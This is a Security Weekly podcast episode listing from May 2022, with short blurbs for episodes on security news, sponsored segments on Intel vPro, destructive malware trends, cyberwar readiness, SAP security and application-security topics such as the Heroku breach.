    In the Security News for this week: Colonial Pipeline facing $1,000,000 fine, cybercrime tracking bill signed into law, Lincoln College Set to Close After Crippling Cyberattack, Nvidia's LHR limiter bypassed, & North Carolina Becomes the First State to Prohibit Public Entities from Paying Ransoms!   Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw740

    Protecting Your Environment with Intel vPro® Platform - Yasser Rasheed - ESW #273

    Play Episode Listen Later May 13, 2022 29:19

    In this segment sponsored by Intel, we will explore all things Intel vPro® platform. Learn how Intel vPro® platform can help you keep your computers up-to-date, prevent attacks, provide reports on the status of the firmware in use, and implement advanced hardware security!   This segment is sponsored by Intel. Visit https://securityweekly.com/intel to learn more about them!   Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw273

    Destructive Malware & Other Threats to Watch - Fleming Shi - PSW #740

    Play Episode Listen Later May 13, 2022 56:25

    In-depth look at destructive malware and other threats the Barracuda team has been monitoring that you need to be aware of.   This segment is sponsored by Barracuda Networks. Visit https://securityweekly.com/barracuda to learn more about them!   Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw740

    5 Demands, 6 Best Practices, & 7 Deadly Sins - BSW #262

    Play Episode Listen Later May 11, 2022 31:29

    In the Leadership & Communications section: 6 information governance best practices, The Seven Deadly Sins Of Leadership, Secrets to building a healthy CISO-vendor partnership, & more!   Visit https://www.securityweekly.com/bsw for all the latest episodes! Show Notes: https://securityweekly.com/bsw262

    Cyber: The Fifth Domain of War - Mike Ernst - BSW #262

    Play Episode Listen Later May 10, 2022 25:35

    Land, sea, air, space, and, increasingly, cyber. These are the five domains where war is conducted. In March 2022, CISA and other international cyber agencies issued guidance urging private and public organizations alike to harden their security postures in preparation for cyber fallout. However, to date, the cyber fallout from the conflict has been minor, leaving some questioning the seriousness of the threat. ExtraHop VP of Sales Engineering, Mike Ernst, joins Business Security Weekly for a candid discussion about the expected impact on private enterprises, and how business leaders and CISOs can use this moment to scrutinize their security posture.   This segment is sponsored by ExtraHop Networks. Visit https://securityweekly.com/extrahop to learn more about them!   Visit https://www.securityweekly.com/bsw for all the latest episodes! Show Notes: https://securityweekly.com/bsw262

    Smart Contract Security, Heroku Breach, & Real World Crypto Highlights - ASW #196

    Play Episode Listen Later May 10, 2022 36:46

    In the AppSec News Mike and John discuss: Secure coding practices and smart contracts, lessons from the Heroku breach, Real World Crypto conference highlights, and an entertaining bug in Google Docs, & more!   Visit https://www.securityweekly.com/asw for all the latest episodes! Show Notes: https://securityweekly.com/asw196

    Securing SAP: Addressing the Critical & Complex Challenge - Christoph Nagy - ASW #196

    Play Episode Listen Later May 9, 2022 36:40

    With 77 percent of all financial transactions touching an SAP system, SAP is the backbone and heart of most organizations. Add to this the vast amounts of customer-facing personal data used within SAP, and you can see why SAP security is critical. However, SAP's complexity, in the form of extensive customization, thousands of configurations, and typical misunderstandings about who and which group is responsible, makes SAP security a challenge. Hear SecurityBridge CEO Christoph Nagy discuss with Security Weekly how organizations can navigate and address these challenges by taking critical steps such as patching, creating baselines, and developing roadmaps for risk prioritization and more to become SAP security heroes.   Visit https://www.securityweekly.com/asw for all the latest episodes! Show Notes: https://securityweekly.com/asw196
